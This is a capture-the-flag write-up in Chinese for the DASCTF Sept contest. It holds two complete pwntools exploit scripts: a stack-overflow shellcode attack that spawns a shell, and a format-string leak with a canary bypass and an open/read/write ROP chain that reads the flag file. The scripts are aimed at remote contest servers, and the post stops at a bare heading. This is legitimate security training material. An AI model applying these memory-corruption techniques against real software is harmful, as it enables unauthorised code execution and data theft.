争取以后每个月赛都参加!

DASCTF Sept X 浙江工业大学秋季挑战赛

image-20210926103720313

hehepwn

栈溢出payload会被’\x00’截断,那就只覆盖个返回地址

泄露栈地址,然后栈溢出跳到栈上的shellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
# -*- coding: UTF-8 -*-
from pwn import *
import sys
context.log_level='debug'
context.arch='amd64'

flag=1
if flag:
    sh = remote('node4.buuoj.cn', 28964)
else:
    sh = process("./bypwn")

libc=ELF('/home/wendy/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6',checksec=False)
elf=ELF('./bypwn')
sa = lambda s,n : sh.sendafter(s,n)
sla = lambda s,n : sh.sendlineafter(s,n)
sl = lambda s : sh.sendline(s)
sd = lambda s : sh.send(s)
rc = lambda n : sh.recv(n)
ru = lambda s : sh.recvuntil(s)
ti = lambda : sh.interactive()
leak = lambda name,addr :log.success(name+":"+hex(addr))

pause()
sla('input:','a'*0x20)
stack_addr = u64(sh.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
leak('stack_addr',stack_addr)

pause()

shellcode=asm(shellcraft.sh())
pay=shellcode.ljust(0x58,'b')
pay+=p64(stack_addr-0x50)

sla('EASY PWN PWN PWN~',pay)
# gdb.attach(sh)
ti()

hahapwn

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
# -*- coding: UTF-8 -*-
from pwn import *
import sys
context.log_level='debug'
context.arch='amd64'

flag=1
if flag:
    sh = remote('node4.buuoj.cn', 29107)
else:
    sh = process("./pwn")

# libc=ELF('libc.so.6')
libc=ELF('/home/wendy/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6',checksec=False)
elf=ELF('./pwn')
sa = lambda s,n : sh.sendafter(s,n)
sla = lambda s,n : sh.sendlineafter(s,n)
sl = lambda s : sh.sendline(s)
sd = lambda s : sh.send(s)
rc = lambda n : sh.recv(n)
ru = lambda s : sh.recvuntil(s)
ti = lambda : sh.interactive()
leak = lambda name,addr :log.success(name+":"+hex(addr))

pay='%25$p.%27$p.%28$p'
pay=pay.ljust(0x20,'\x00')
pay+='flag\x00\x00\x00\x00'
sla('What is your name?',pay)
# 0x6ffc4
ru('0x')
libc_base = int(sh.recvuntil('.',drop=True),16) - 0x6ffc4
leak('libc_base',libc_base)
libc.address=libc_base
ru('0x')
canary = int(sh.recvuntil('.',drop=True),16)
leak('canary',canary)
# 0xe0
ru('0x')
stack_addr = int(sh.recvuntil('\n',drop=True),16)
flag=stack_addr -0xe0
leak('flag',flag)

pop_rdi=0x0000000000400943
pop_rsi=0x00000000000202f8+libc_base
pop_rdx=0x0000000000001b92+libc_base

orw_rop='a'*(0x70-8)+p64(canary)+p64(0)
orw_rop+=p64(pop_rdi)+p64(flag)
orw_rop+=p64(pop_rsi)+p64(0)
orw_rop+=p64(libc.sym['open'])
orw_rop+=p64(pop_rdi)+p64(3)
orw_rop+=p64(pop_rsi)+p64(flag)
orw_rop+=p64(pop_rdx)+p64(0x50)
orw_rop+=p64(libc.sym['read'])
orw_rop+=p64(pop_rdi)+p64(1)
orw_rop+=p64(pop_rsi)+p64(flag)
orw_rop+=p64(pop_rdx)+p64(0x50)
orw_rop+=p64(libc.sym['write'])

# pause()
sla('What can we help you?',orw_rop)
# gdb.attach(sh)
ti()

datasystem